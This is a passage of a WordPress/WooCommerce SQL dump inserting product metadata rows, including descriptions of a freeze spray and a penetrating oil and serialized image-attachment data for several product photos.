INSERT INTO `wp_postmeta` VALUES (17477, 1726, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17478, 1726, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17479, 1726, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17480, 1726, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17481, 1726, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17482, 1726, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17483, 1726, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17484, 1726, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17485, 1726, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17486, 1726, '_ywtm_content_tab_description', '<p class="h10"><strong>MS-242N-AS</strong>: Same general application as MS-242L but with an antistatic agent. Not recommended for freezing biological specimens. Helps dissipate any static charges which may build up during spray. Instantly freezes small areas to -50°F(-45°C). Compatible with most plastics, rubbers and metals.  Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).</p>'); 
INSERT INTO `wp_postmeta` VALUES (17487, 1726, '_product_image_gallery', '1744'); 
INSERT INTO `wp_postmeta` VALUES (17488, 1728, '_wp_attached_file', '2016/09/quik-freeze-anti-static.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17489, 1728, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:35:"2016/09/quik-freeze-anti-static.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"quik-freeze-anti-static-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"quik-freeze-anti-static-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"quik-freeze-anti-static-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"quik-freeze-anti-static-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"quik-freeze-anti-static-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"quik-freeze-anti-static-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"quik-freeze-anti-static-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"quik-freeze-anti-static-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17490, 1726, '_thumbnail_id', '1728'); 
INSERT INTO `wp_postmeta` VALUES (17491, 1729, '_edit_lock', '1482170130:2'); 
INSERT INTO `wp_postmeta` VALUES (17492, 1729, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17493, 1730, '_wp_attached_file', '2016/09/penetrating-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17494, 1730, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:27:"2016/09/penetrating-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"penetrating-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"penetrating-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"penetrating-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"penetrating-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"penetrating-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"penetrating-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"penetrating-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"penetrating-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17495, 1729, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17496, 1729, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17497, 1729, '_thumbnail_id', '1730'); 
INSERT INTO `wp_postmeta` VALUES (17498, 1729, '312_default_editor', '<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Boiling Point</td>\r\n<td style="text-align: center;" width="180">35°C</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">1.2 g/ml @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">490 mmHg</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content, Aerosol</td>\r\n<td style="text-align: center;">392g/l</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content, Bulk</td>\r\n<td style="text-align: center;">490g/l</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17499, 1729, '1367_default_editor', '<strong>K0725A </strong>(12 oz Aerosol)\r\n<strong>K0725B </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17500, 1729, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17501, 1729, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17502, 1729, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17503, 1729, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17504, 1729, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17505, 1729, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17506, 1729, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17507, 1729, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17508, 1729, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17509, 1729, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17510, 1729, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17511, 1729, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17512, 1729, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17513, 1729, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17514, 1729, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17515, 1729, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17516, 1729, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17517, 1729, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17518, 1729, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17519, 1729, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17520, 1729, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17521, 1729, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17522, 1729, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17523, 1729, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17524, 1729, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17525, 1729, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17526, 1729, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17527, 1729, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17528, 1729, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17529, 1729, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17530, 1729, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17531, 1729, '_ywtm_content_tab_description', 'Miller-Stephenson\'s Penetrating Oil is fast acting to free rusted nuts and bolts, hinges, locks, pipe threads, chains, clamps and latches. The low surface tension carrier solvent and synthetic lubricating oil penetrate the tightest crevices. Apply the Penetrating Oil liberally and allow to soak for a few minutes. If the parts are heavily rusted, tapping or vibrating the parts will help. Contains no silicones. Safe for all metals as well as plastics and elastomers.'); 
INSERT INTO `wp_postmeta` VALUES (17532, 1729, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17533, 1731, '_wp_attached_file', '2016/09/Vydax-NRT-960.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17534, 1731, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/09/Vydax-NRT-960.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"Vydax-NRT-960-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"Vydax-NRT-960-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"Vydax-NRT-960-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"Vydax-NRT-960-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"Vydax-NRT-960-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"Vydax-NRT-960-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"Vydax-NRT-960-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"Vydax-NRT-960-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17535, 1732, '_wp_attached_file', '2016/09/MS-114C.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17536, 1732, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-114C.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-114C-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-114C-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-114C-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-114C-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-114C-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-114C-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-114C-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-114C-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17537, 1733, '_wp_attached_file', '2016/09/MS-122AD.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17538, 1733, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-122AD.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-122AD-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-122AD-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-122AD-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-122AD-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-122AD-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-122AD-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-122AD-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-122AD-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17541, 1735, '_wp_attached_file', '2016/09/MS-122SE.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17542, 1735, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-122SE.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-122SE-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-122SE-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-122SE-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-122SE-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-122SE-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-122SE-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-122SE-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-122SE-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17543, 1736, '_wp_attached_file', '2016/09/MS-122XD.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17544, 1736, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-122XD.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-122XD-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-122XD-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-122XD-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-122XD-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-122XD-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-122XD-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-122XD-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-122XD-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17545, 1737, '_wp_attached_file', '2016/09/MS-143AX.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17546, 1737, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-143AX.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-143AX-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-143AX-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-143AX-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-143AX-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-143AX-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-143AX-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-143AX-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-143AX-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17547, 1738, '_wp_attached_file', '2016/09/MS-143TE.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17548, 1738, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-143TE.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-143TE-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-143TE-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-143TE-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-143TE-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-143TE-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-143TE-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-143TE-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-143TE-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17549, 1739, '_wp_attached_file', '2016/09/MS-143XD.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17550, 1739, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-143XD.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-143XD-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-143XD-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-143XD-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-143XD-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-143XD-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-143XD-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-143XD-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-143XD-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17551, 1740, '_wp_attached_file', '2016/09/MS-153BN.jpg'); 
